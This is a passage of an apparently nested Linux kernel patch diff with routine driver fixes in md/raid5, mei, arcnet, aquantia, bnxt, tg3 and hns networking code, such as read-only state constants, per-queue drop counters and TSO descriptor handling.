+ 
+ out_unlock:
+@@ -8269,9 +8282,9 @@ static int md_seq_show(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "%s : %sactive", mdname(mddev),
+ 						mddev->pers ? "" : "in");
+ 		if (mddev->pers) {
+-			if (mddev->ro==1)
++			if (mddev->ro == MD_RDONLY)
+ 				seq_printf(seq, " (read-only)");
+-			if (mddev->ro==2)
++			if (mddev->ro == MD_AUTO_READ)
+ 				seq_printf(seq, " (auto-read-only)");
+ 			seq_printf(seq, " %s", mddev->pers->name);
+ 		}
+@@ -8530,10 +8543,10 @@ bool md_write_start(struct mddev *mddev, struct bio *bi)
+ 	if (bio_data_dir(bi) != WRITE)
+ 		return true;
+ 
+-	BUG_ON(mddev->ro == 1);
+-	if (mddev->ro == 2) {
++	BUG_ON(mddev->ro == MD_RDONLY);
++	if (mddev->ro == MD_AUTO_READ) {
+ 		/* need to switch to read/write */
+-		mddev->ro = 0;
++		mddev->ro = MD_RDWR;
+ 		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+ 		md_wakeup_thread(mddev->thread);
+ 		md_wakeup_thread(mddev->sync_thread);
+@@ -8584,7 +8597,7 @@ void md_write_inc(struct mddev *mddev, struct bio *bi)
+ {
+ 	if (bio_data_dir(bi) != WRITE)
+ 		return;
+-	WARN_ON_ONCE(mddev->in_sync || mddev->ro);
++	WARN_ON_ONCE(mddev->in_sync || !md_is_rdwr(mddev));
+ 	percpu_ref_get(&mddev->writes_pending);
+ }
+ EXPORT_SYMBOL(md_write_inc);
+@@ -8690,7 +8703,7 @@ void md_allow_write(struct mddev *mddev)
+ {
+ 	if (!mddev->pers)
+ 		return;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return;
+ 	if (!mddev->pers->sync_request)
+ 		return;
+@@ -8738,7 +8751,7 @@ void md_do_sync(struct md_thread *thread)
+ 	if (test_bit(MD_RECOVERY_DONE, &mddev->recovery) ||
+ 	    test_bit(MD_RECOVERY_WAIT, &mddev->recovery))
+ 		return;
+-	if (mddev->ro) {/* never try to sync a read-only array */
++	if (!md_is_rdwr(mddev)) {/* never try to sync a read-only array */
+ 		set_bit(MD_RECOVERY_INTR, &mddev->recovery);
+ 		return;
+ 	}
+@@ -9207,9 +9220,9 @@ static int remove_and_add_spares(struct mddev *mddev,
+ 		if (test_bit(Faulty, &rdev->flags))
+ 			continue;
+ 		if (!test_bit(Journal, &rdev->flags)) {
+-			if (mddev->ro &&
+-			    ! (rdev->saved_raid_disk >= 0 &&
+-			       !test_bit(Bitmap_sync, &rdev->flags)))
++			if (!md_is_rdwr(mddev) &&
++			    !(rdev->saved_raid_disk >= 0 &&
++			      !test_bit(Bitmap_sync, &rdev->flags)))
+ 				continue;
+ 
+ 			rdev->recovery_offset = 0;
+@@ -9307,7 +9320,8 @@ void md_check_recovery(struct mddev *mddev)
+ 		flush_signals(current);
+ 	}
+ 
+-	if (mddev->ro && !test_bit(MD_RECOVERY_NEEDED, &mddev->recovery))
++	if (!md_is_rdwr(mddev) &&
++	    !test_bit(MD_RECOVERY_NEEDED, &mddev->recovery))
+ 		return;
+ 	if ( ! (
+ 		(mddev->sb_flags & ~ (1<<MD_SB_CHANGE_PENDING)) ||
+@@ -9326,7 +9340,7 @@ void md_check_recovery(struct mddev *mddev)
+ 		if (!mddev->external && mddev->safemode == 1)
+ 			mddev->safemode = 0;
+ 
+-		if (mddev->ro) {
++		if (!md_is_rdwr(mddev)) {
+ 			struct md_rdev *rdev;
+ 			if (!mddev->external && mddev->in_sync)
+ 				/* 'Blocked' flag not needed as failed devices
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 98d4e93efa31c..e4564ca1f2434 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -5905,11 +5905,11 @@ static bool stripe_ahead_of_reshape(struct mddev *mddev, struct r5conf *conf,
+ 	int dd_idx;
+ 
+ 	for (dd_idx = 0; dd_idx < sh->disks; dd_idx++) {
+-		if (dd_idx == sh->pd_idx)
++		if (dd_idx == sh->pd_idx || dd_idx == sh->qd_idx)
+ 			continue;
+ 
+ 		min_sector = min(min_sector, sh->dev[dd_idx].sector);
+-		max_sector = min(max_sector, sh->dev[dd_idx].sector);
++		max_sector = max(max_sector, sh->dev[dd_idx].sector);
+ 	}
+ 
+ 	spin_lock_irq(&conf->device_lock);
+diff --git a/drivers/misc/mei/client.c b/drivers/misc/mei/client.c
+index 0b2fbe1335a77..c70c89209fe55 100644
+--- a/drivers/misc/mei/client.c
++++ b/drivers/misc/mei/client.c
+@@ -1978,7 +1978,7 @@ ssize_t mei_cl_write(struct mei_cl *cl, struct mei_cl_cb *cb)
+ 
+ 	mei_hdr = mei_msg_hdr_init(cb);
+ 	if (IS_ERR(mei_hdr)) {
+-		rets = -PTR_ERR(mei_hdr);
++		rets = PTR_ERR(mei_hdr);
+ 		mei_hdr = NULL;
+ 		goto err;
+ 	}
+@@ -2002,7 +2002,7 @@ ssize_t mei_cl_write(struct mei_cl *cl, struct mei_cl_cb *cb)
+ 
+ 	hbuf_slots = mei_hbuf_empty_slots(dev);
+ 	if (hbuf_slots < 0) {
+-		rets = -EOVERFLOW;
++		buf_len = -EOVERFLOW;
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/arcnet/arcdevice.h b/drivers/net/arcnet/arcdevice.h
+index 19e996a829c9d..b54275389f8ac 100644
+--- a/drivers/net/arcnet/arcdevice.h
++++ b/drivers/net/arcnet/arcdevice.h
+@@ -186,6 +186,8 @@ do {									\
+ #define ARC_IS_5MBIT    1   /* card default speed is 5MBit */
+ #define ARC_CAN_10MBIT  2   /* card uses COM20022, supporting 10MBit,
+ 				 but default is 2.5MBit. */
++#define ARC_HAS_LED     4   /* card has software controlled LEDs */
++#define ARC_HAS_ROTARY  8   /* card has rotary encoder */
+ 
+ /* information needed to define an encapsulation driver */
+ struct ArcProto {
+diff --git a/drivers/net/arcnet/com20020-pci.c b/drivers/net/arcnet/com20020-pci.c
+index c580acb8b1d34..7b5c8bb02f119 100644
+--- a/drivers/net/arcnet/com20020-pci.c
++++ b/drivers/net/arcnet/com20020-pci.c
+@@ -213,12 +213,13 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 		if (!strncmp(ci->name, "EAE PLX-PCI FB2", 15))
+ 			lp->backplane = 1;
+ 
+-		/* Get the dev_id from the PLX rotary coder */
+-		if (!strncmp(ci->name, "EAE PLX-PCI MA1", 15))
+-			dev_id_mask = 0x3;
+-		dev->dev_id = (inb(priv->misc + ci->rotary) >> 4) & dev_id_mask;
+-
+-		snprintf(dev->name, sizeof(dev->name), "arc%d-%d", dev->dev_id, i);
++		if (ci->flags & ARC_HAS_ROTARY) {
++			/* Get the dev_id from the PLX rotary coder */
++			if (!strncmp(ci->name, "EAE PLX-PCI MA1", 15))
++				dev_id_mask = 0x3;
++			dev->dev_id = (inb(priv->misc + ci->rotary) >> 4) & dev_id_mask;
++			snprintf(dev->name, sizeof(dev->name), "arc%d-%d", dev->dev_id, i);
++		}
+ 
+ 		if (arcnet_inb(ioaddr, COM20020_REG_R_STATUS) == 0xFF) {
+ 			pr_err("IO address %Xh is empty!\n", ioaddr);
+@@ -230,6 +231,10 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 			goto err_free_arcdev;
+ 		}
+ 
++		ret = com20020_found(dev, IRQF_SHARED);
++		if (ret)
++			goto err_free_arcdev;
++
+ 		card = devm_kzalloc(&pdev->dev, sizeof(struct com20020_dev),
+ 				    GFP_KERNEL);
+ 		if (!card) {
+@@ -239,41 +244,39 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 
+ 		card->index = i;
+ 		card->pci_priv = priv;
+-		card->tx_led.brightness_set = led_tx_set;
+-		card->tx_led.default_trigger = devm_kasprintf(&pdev->dev,
+-						GFP_KERNEL, "arc%d-%d-tx",
+-						dev->dev_id, i);
+-		card->tx_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+-						"pci:green:tx:%d-%d",
+-						dev->dev_id, i);
+-
+-		card->tx_led.dev = &dev->dev;
+-		card->recon_led.brightness_set = led_recon_set;
+-		card->recon_led.default_trigger = devm_kasprintf(&pdev->dev,
+-						GFP_KERNEL, "arc%d-%d-recon",
+-						dev->dev_id, i);
+-		card->recon_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+-						"pci:red:recon:%d-%d",
+-						dev->dev_id, i);
+-		card->recon_led.dev = &dev->dev;
+-		card->dev = dev;
+-
+-		ret = devm_led_classdev_register(&pdev->dev, &card->tx_led);
+-		if (ret)
+-			goto err_free_arcdev;
+ 
+-		ret = devm_led_classdev_register(&pdev->dev, &card->recon_led);
+-		if (ret)
+-			goto err_free_arcdev;
+-
+-		dev_set_drvdata(&dev->dev, card);
+-
+-		ret = com20020_found(dev, IRQF_SHARED);
+-		if (ret)
+-			goto err_free_arcdev;
+-
+-		devm_arcnet_led_init(dev, dev->dev_id, i);
++		if (ci->flags & ARC_HAS_LED) {
++			card->tx_led.brightness_set = led_tx_set;
++			card->tx_led.default_trigger = devm_kasprintf(&pdev->dev,
++							GFP_KERNEL, "arc%d-%d-tx",
++							dev->dev_id, i);
++			card->tx_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
++							"pci:green:tx:%d-%d",
++							dev->dev_id, i);
++
++			card->tx_led.dev = &dev->dev;
++			card->recon_led.brightness_set = led_recon_set;
++			card->recon_led.default_trigger = devm_kasprintf(&pdev->dev,
++							GFP_KERNEL, "arc%d-%d-recon",
++							dev->dev_id, i);
++			card->recon_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
++							"pci:red:recon:%d-%d",
++							dev->dev_id, i);
++			card->recon_led.dev = &dev->dev;
++
++			ret = devm_led_classdev_register(&pdev->dev, &card->tx_led);
++			if (ret)
++				goto err_free_arcdev;
++
++			ret = devm_led_classdev_register(&pdev->dev, &card->recon_led);
++			if (ret)
++				goto err_free_arcdev;
++
++			dev_set_drvdata(&dev->dev, card);
++			devm_arcnet_led_init(dev, dev->dev_id, i);
++		}
+ 
++		card->dev = dev;
+ 		list_add(&card->list, &priv->list_dev);
+ 		continue;
+ 
+@@ -329,7 +332,7 @@ static struct com20020_pci_card_info card_info_5mbit = {
+ };
+ 
+ static struct com20020_pci_card_info card_info_sohard = {
+-	.name = "PLX-PCI",
++	.name = "SOHARD SH ARC-PCI",
+ 	.devcount = 1,
+ 	/* SOHARD needs PCI base addr 4 */
+ 	.chan_map_tbl = {
+@@ -364,7 +367,7 @@ static struct com20020_pci_card_info card_info_eae_arc1 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static struct com20020_pci_card_info card_info_eae_ma1 = {
+@@ -396,7 +399,7 @@ static struct com20020_pci_card_info card_info_eae_ma1 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static struct com20020_pci_card_info card_info_eae_fb2 = {
+@@ -421,7 +424,7 @@ static struct com20020_pci_card_info card_info_eae_fb2 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static const struct pci_device_id com20020pci_id_table[] = {
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index 80b44043e6c53..28c9b6f1a54f1 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -553,17 +553,17 @@ void aq_ptp_tx_hwtstamp(struct aq_nic_s *aq_nic, u64 timestamp)
+ 
+ /* aq_ptp_rx_hwtstamp - utility function which checks for RX time stamp
+  * @adapter: pointer to adapter struct
+- * @skb: particular skb to send timestamp with
++ * @shhwtstamps: particular skb_shared_hwtstamps to save timestamp
+  *
+  * if the timestamp is valid, we convert it into the timecounter ns
+  * value, then store that result into the hwtstamps structure which
+  * is passed up the network stack
+  */
+-static void aq_ptp_rx_hwtstamp(struct aq_ptp_s *aq_ptp, struct sk_buff *skb,
++static void aq_ptp_rx_hwtstamp(struct aq_ptp_s *aq_ptp, struct skb_shared_hwtstamps *shhwtstamps,
+ 			       u64 timestamp)
+ {
+ 	timestamp -= atomic_read(&aq_ptp->offset_ingress);
+-	aq_ptp_convert_to_hwtstamp(aq_ptp, skb_hwtstamps(skb), timestamp);
++	aq_ptp_convert_to_hwtstamp(aq_ptp, shhwtstamps, timestamp);
+ }
+ 
+ void aq_ptp_hwtstamp_config_get(struct aq_ptp_s *aq_ptp,
+@@ -639,7 +639,7 @@ bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring)
+ 	       &aq_ptp->ptp_rx == ring || &aq_ptp->hwts_rx == ring;
+ }
+ 
+-u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
++u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 		      unsigned int len)
+ {
+ 	struct aq_ptp_s *aq_ptp = aq_nic->aq_ptp;
+@@ -648,7 +648,7 @@ u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
+ 						   p, len, &timestamp);
+ 
+ 	if (ret > 0)
+-		aq_ptp_rx_hwtstamp(aq_ptp, skb, timestamp);
++		aq_ptp_rx_hwtstamp(aq_ptp, shhwtstamps, timestamp);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
+index 28ccb7ca2df9e..210b723f22072 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
+@@ -67,7 +67,7 @@ int aq_ptp_hwtstamp_config_set(struct aq_ptp_s *aq_ptp,
+ /* Return either ring is belong to PTP or not*/
+ bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring);
+ 
+-u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
++u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 		      unsigned int len);
+ 
+ struct ptp_clock *aq_ptp_get_ptp_clock(struct aq_ptp_s *aq_ptp);
+@@ -143,7 +143,7 @@ static inline bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring)
+ }
+ 
+ static inline u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic,
+-				    struct sk_buff *skb, u8 *p,
++				    struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 				    unsigned int len)
+ {
+ 	return 0;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 2dc8d215a5918..b5a49166fa972 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -647,7 +647,7 @@ static int __aq_ring_rx_clean(struct aq_ring_s *self, struct napi_struct *napi,
+ 		}
+ 		if (is_ptp_ring)
+ 			buff->len -=
+-				aq_ptp_extract_ts(self->aq_nic, skb,
++				aq_ptp_extract_ts(self->aq_nic, skb_hwtstamps(skb),
+ 						  aq_buf_vaddr(&buff->rxdata),
+ 						  buff->len);
+ 
+@@ -742,6 +742,8 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		struct aq_ring_buff_s *buff = &rx_ring->buff_ring[rx_ring->sw_head];
+ 		bool is_ptp_ring = aq_ptp_ring(rx_ring->aq_nic, rx_ring);
+ 		struct aq_ring_buff_s *buff_ = NULL;
++		u16 ptp_hwtstamp_len = 0;
++		struct skb_shared_hwtstamps shhwtstamps;
+ 		struct sk_buff *skb = NULL;
+ 		unsigned int next_ = 0U;
+ 		struct xdp_buff xdp;
+@@ -810,11 +812,12 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		hard_start = page_address(buff->rxdata.page) +
+ 			     buff->rxdata.pg_off - rx_ring->page_offset;
+ 
+-		if (is_ptp_ring)
+-			buff->len -=
+-				aq_ptp_extract_ts(rx_ring->aq_nic, skb,
+-						  aq_buf_vaddr(&buff->rxdata),
+-						  buff->len);
++		if (is_ptp_ring) {
++			ptp_hwtstamp_len = aq_ptp_extract_ts(rx_ring->aq_nic, &shhwtstamps,
++							     aq_buf_vaddr(&buff->rxdata),
++							     buff->len);
++			buff->len -= ptp_hwtstamp_len;
++		}
+ 
+ 		xdp_init_buff(&xdp, frame_sz, &rx_ring->xdp_rxq);
+ 		xdp_prepare_buff(&xdp, hard_start, rx_ring->page_offset,
+@@ -834,6 +837,9 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		if (IS_ERR(skb) || !skb)
+ 			continue;
+ 
++		if (ptp_hwtstamp_len > 0)
++			*skb_hwtstamps(skb) = shhwtstamps;
++
+ 		if (buff->is_vlan)
+ 			__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q),
+ 					       buff->vlan_rx_tag);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
+index d8afcf8d6b30e..4d6663ff84722 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
+@@ -2075,6 +2075,7 @@ destroy_flow_table:
+ 	rhashtable_destroy(&tc_info->flow_table);
+ free_tc_info:
+ 	kfree(tc_info);
++	bp->tc_info = NULL;
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 85570e40c8e9b..f60a16de565ed 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -6853,7 +6853,7 @@ static int tg3_rx(struct tg3_napi *tnapi, int budget)
+ 				       desc_idx, *post_ptr);
+ 		drop_it_no_recycle:
+ 			/* Other statistics kept track of by card. */
+-			tp->rx_dropped++;
++			tnapi->rx_dropped++;
+ 			goto next_pkt;
+ 		}
+ 
+@@ -7879,8 +7879,10 @@ static int tg3_tso_bug(struct tg3 *tp, struct tg3_napi *tnapi,
+ 
+ 	segs = skb_gso_segment(skb, tp->dev->features &
+ 				    ~(NETIF_F_TSO | NETIF_F_TSO6));
+-	if (IS_ERR(segs) || !segs)
++	if (IS_ERR(segs) || !segs) {
++		tnapi->tx_dropped++;
+ 		goto tg3_tso_bug_end;
++	}
+ 
+ 	skb_list_walk_safe(segs, seg, next) {
+ 		skb_mark_not_on_list(seg);
+@@ -8151,7 +8153,7 @@ dma_error:
+ drop:
+ 	dev_kfree_skb_any(skb);
+ drop_nofree:
+-	tp->tx_dropped++;
++	tnapi->tx_dropped++;
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -9330,7 +9332,7 @@ static void __tg3_set_rx_mode(struct net_device *);
+ /* tp->lock is held. */
+ static int tg3_halt(struct tg3 *tp, int kind, bool silent)
+ {
+-	int err;
++	int err, i;
+ 
+ 	tg3_stop_fw(tp);
+ 
+@@ -9351,6 +9353,13 @@ static int tg3_halt(struct tg3 *tp, int kind, bool silent)
+ 
+ 		/* And make sure the next sample is new data */
+ 		memset(tp->hw_stats, 0, sizeof(struct tg3_hw_stats));
++
++		for (i = 0; i < TG3_IRQ_MAX_VECS; ++i) {
++			struct tg3_napi *tnapi = &tp->napi[i];
++
++			tnapi->rx_dropped = 0;
++			tnapi->tx_dropped = 0;
++		}
+ 	}
+ 
+ 	return err;
+@@ -11900,6 +11909,9 @@ static void tg3_get_nstats(struct tg3 *tp, struct rtnl_link_stats64 *stats)
+ {
+ 	struct rtnl_link_stats64 *old_stats = &tp->net_stats_prev;
+ 	struct tg3_hw_stats *hw_stats = tp->hw_stats;
++	unsigned long rx_dropped;
++	unsigned long tx_dropped;
++	int i;
+ 
+ 	stats->rx_packets = old_stats->rx_packets +
+ 		get_stat64(&hw_stats->rx_ucast_packets) +
+@@ -11946,8 +11958,26 @@ static void tg3_get_nstats(struct tg3 *tp, struct rtnl_link_stats64 *stats)
+ 	stats->rx_missed_errors = old_stats->rx_missed_errors +
+ 		get_stat64(&hw_stats->rx_discards);
+ 
+-	stats->rx_dropped = tp->rx_dropped;
+-	stats->tx_dropped = tp->tx_dropped;
++	/* Aggregate per-queue counters. The per-queue counters are updated
++	 * by a single writer, race-free. The result computed by this loop
++	 * might not be 100% accurate (counters can be updated in the middle of
++	 * the loop) but the next tg3_get_nstats() will recompute the current
++	 * value so it is acceptable.
++	 *
++	 * Note that these counters wrap around at 4G on 32bit machines.
++	 */
++	rx_dropped = (unsigned long)(old_stats->rx_dropped);
++	tx_dropped = (unsigned long)(old_stats->tx_dropped);
++
++	for (i = 0; i < tp->irq_cnt; i++) {
++		struct tg3_napi *tnapi = &tp->napi[i];
++
++		rx_dropped += tnapi->rx_dropped;
++		tx_dropped += tnapi->tx_dropped;
++	}
++
++	stats->rx_dropped = rx_dropped;
++	stats->tx_dropped = tx_dropped;
+ }
+ 
+ static int tg3_get_regs_len(struct net_device *dev)
+diff --git a/drivers/net/ethernet/broadcom/tg3.h b/drivers/net/ethernet/broadcom/tg3.h
+index 1000c894064f0..8d753f8c5b065 100644
+--- a/drivers/net/ethernet/broadcom/tg3.h
++++ b/drivers/net/ethernet/broadcom/tg3.h
+@@ -3018,6 +3018,7 @@ struct tg3_napi {
+ 	u16				*rx_rcb_prod_idx;
+ 	struct tg3_rx_prodring_set	prodring;
+ 	struct tg3_rx_buffer_desc	*rx_rcb;
++	unsigned long			rx_dropped;
+ 
+ 	u32				tx_prod	____cacheline_aligned;
+ 	u32				tx_cons;
+@@ -3026,6 +3027,7 @@ struct tg3_napi {
+ 	u32				prodmbox;
+ 	struct tg3_tx_buffer_desc	*tx_ring;
+ 	struct tg3_tx_ring_info		*tx_buffers;
++	unsigned long			tx_dropped;
+ 
+ 	dma_addr_t			status_mapping;
+ 	dma_addr_t			rx_rcb_mapping;
+@@ -3219,8 +3221,6 @@ struct tg3 {
+ 
+ 
+ 	/* begin "everything else" cacheline(s) section */
+-	unsigned long			rx_dropped;
+-	unsigned long			tx_dropped;
+ 	struct rtnl_link_stats64	net_stats_prev;
+ 	struct tg3_ethtool_stats	estats_prev;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
+index 928d934cb21a5..f75668c479351 100644
+--- a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
++++ b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
+@@ -66,6 +66,27 @@ static enum mac_mode hns_get_enet_interface(const struct hns_mac_cb *mac_cb)
+ 	}
+ }
+ 
++static u32 hns_mac_link_anti_shake(struct mac_driver *mac_ctrl_drv)
++{
++#define HNS_MAC_LINK_WAIT_TIME 5
++#define HNS_MAC_LINK_WAIT_CNT 40
++
++	u32 link_status = 0;
++	int i;
++
++	if (!mac_ctrl_drv->get_link_status)
++		return link_status;
++
++	for (i = 0; i < HNS_MAC_LINK_WAIT_CNT; i++) {
++		msleep(HNS_MAC_LINK_WAIT_TIME);
++		mac_ctrl_drv->get_link_status(mac_ctrl_drv, &link_status);
++		if (!link_status)
++			break;
++	}
++
++	return link_status;
++}
++
+ void hns_mac_get_link_status(struct hns_mac_cb *mac_cb, u32 *link_status)
+ {
+ 	struct mac_driver *mac_ctrl_drv;
+@@ -83,6 +104,14 @@ void hns_mac_get_link_status(struct hns_mac_cb *mac_cb, u32 *link_status)
+ 							       &sfp_prsnt);
+ 		if (!ret)
+ 			*link_status = *link_status && sfp_prsnt;
++
++		/* for FIBER port, it may have a fake link up.
++		 * when the link status changes from down to up, we need to do
++		 * anti-shake. the anti-shake time is base on tests.
++		 * only FIBER port need to do this.
++		 */
++		if (*link_status && !mac_cb->link)
++			*link_status = hns_mac_link_anti_shake(mac_ctrl_drv);
+ 	}
+ 
+ 	mac_cb->link = *link_status;
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_enet.c b/drivers/net/ethernet/hisilicon/hns/hns_enet.c
+index 7cf10d1e2b311..85722afe21770 100644
+--- a/drivers/net/ethernet/hisilicon/hns/hns_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns/hns_enet.c
+@@ -142,7 +142,8 @@ MODULE_DEVICE_TABLE(acpi, hns_enet_acpi_match);
+ 
+ static void fill_desc(struct hnae_ring *ring, void *priv,
+ 		      int size, dma_addr_t dma, int frag_end,
+-		      int buf_num, enum hns_desc_type type, int mtu)
++		      int buf_num, enum hns_desc_type type, int mtu,
++		      bool is_gso)
+ {
+ 	struct hnae_desc *desc = &ring->desc[ring->next_to_use];
+ 	struct hnae_desc_cb *desc_cb = &ring->desc_cb[ring->next_to_use];
+@@ -275,6 +276,15 @@ static int hns_nic_maybe_stop_tso(
+ 	return 0;
+ }
+ 
++static int hns_nic_maybe_stop_tx_v2(struct sk_buff **out_skb, int *bnum,
++				    struct hnae_ring *ring)
++{
++	if (skb_is_gso(*out_skb))
++		return hns_nic_maybe_stop_tso(out_skb, bnum, ring);
++	else
++		return hns_nic_maybe_stop_tx(out_skb, bnum, ring);
++}
++
+ static void fill_tso_desc(struct hnae_ring *ring, void *priv,
+ 			  int size, dma_addr_t dma, int frag_end,
+ 			  int buf_num, enum hns_desc_type type, int mtu)
+@@ -300,6 +310,19 @@ static void fill_tso_desc(struct hnae_ring *ring, void *priv,
+ 				mtu);
+ }
+ 
++static void fill_desc_v2(struct hnae_ring *ring, void *priv,
++			 int size, dma_addr_t dma, int frag_end,
++			 int buf_num, enum hns_desc_type type, int mtu,
++			 bool is_gso)
++{
++	if (is_gso)
++		fill_tso_desc(ring, priv, size, dma, frag_end, buf_num, type,
++			      mtu);
++	else
++		fill_v2_desc(ring, priv, size, dma, frag_end, buf_num, type,
++			     mtu);
++}
++
+ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 				struct sk_buff *skb,
+ 				struct hns_nic_ring_data *ring_data)
+@@ -313,6 +336,7 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 	int seg_num;
+ 	dma_addr_t dma;
+ 	int size, next_to_use;
++	bool is_gso;
+ 	int i;
+ 
+ 	switch (priv->ops.maybe_stop_tx(&skb, &buf_num, ring)) {
+@@ -339,8 +363,9 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 		ring->stats.sw_err_cnt++;
+ 		goto out_err_tx_ok;
+ 	}
++	is_gso = skb_is_gso(skb);
+ 	priv->ops.fill_desc(ring, skb, size, dma, seg_num == 1 ? 1 : 0,
+-			    buf_num, DESC_TYPE_SKB, ndev->mtu);
++			    buf_num, DESC_TYPE_SKB, ndev->mtu, is_gso);
+ 
+ 	/* fill the fragments */
+ 	for (i = 1; i < seg_num; i++) {
+@@ -354,7 +379,7 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 		}
+ 		priv->ops.fill_desc(ring, skb_frag_page(frag), size, dma,
+ 				    seg_num - 1 == i ? 1 : 0, buf_num,
+-				    DESC_TYPE_PAGE, ndev->mtu);
++				    DESC_TYPE_PAGE, ndev->mtu, is_gso);
+ 	}
+ 
+ 	/*complete translate all packets*/
+@@ -1776,15 +1801,6 @@ static int hns_nic_set_features(struct net_device *netdev,
+ 			netdev_info(netdev, "enet v1 do not support tso!\n");
+ 		break;
+ 	default:
+-		if (features & (NETIF_F_TSO | NETIF_F_TSO6)) {
+-			priv->ops.fill_desc = fill_tso_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tso;
+-			/* The chip only support 7*4096 */
+-			netif_set_tso_max_size(netdev, 7 * 4096);
+-		} else {
+-			priv->ops.fill_desc = fill_v2_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+-		}
+ 		break;
+ 	}
+ 	netdev->features = features;
+@@ -2159,16 +2175,9 @@ static void hns_nic_set_priv_ops(struct net_device *netdev)
+ 		priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+ 	} else {
+ 		priv->ops.get_rxd_bnum = get_v2rx_desc_bnum;
+-		if ((netdev->features & NETIF_F_TSO) ||
+-		    (netdev->features & NETIF_F_TSO6)) {
+-			priv->ops.fill_desc = fill_tso_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tso;
+-			/* This chip only support 7*4096 */
+-			netif_set_tso_max_size(netdev, 7 * 4096);
+-		} else {
+-			priv->ops.fill_desc = fill_v2_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+-		}
++		priv->ops.fill_desc = fill_desc_v2;
++		priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx_v2;
++		netif_set_tso_max_size(netdev, 7 * 4096);
+ 		/* enable tso when init
+ 		 * control tso on/off through TSE bit in bd
+ 		 */
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_enet.h b/drivers/net/ethernet/hisilicon/hns/hns_enet.h
+index ffa9d6573f54b..3f3ee032f631c 100644
